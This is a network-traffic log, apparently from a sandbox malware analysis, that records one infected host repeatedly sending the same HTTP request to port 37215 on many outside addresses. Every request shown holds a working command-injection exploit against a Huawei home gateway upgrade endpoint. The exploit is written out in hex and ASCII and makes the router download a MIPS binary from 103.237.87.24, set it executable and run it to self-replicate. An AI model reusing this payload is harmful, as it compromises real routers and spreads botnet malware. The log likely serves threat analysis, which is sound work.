                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  471192.168.2.1339028217.224.166.1537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.116615057 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  472192.168.2.1349592148.162.75.1737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.116616964 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  473192.168.2.1335036197.180.92.4837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.116640091 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  474192.168.2.1347484197.73.140.21637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.116640091 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  475192.168.2.135998241.250.144.11037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.116664886 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  476192.168.2.1347112200.34.27.2637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.116664886 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  477192.168.2.134206241.78.252.9837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.116682053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  478192.168.2.1354864192.8.56.7237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.116702080 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  479192.168.2.1333020157.172.90.22737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.117249012 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  480192.168.2.136052641.59.247.15837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.117252111 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 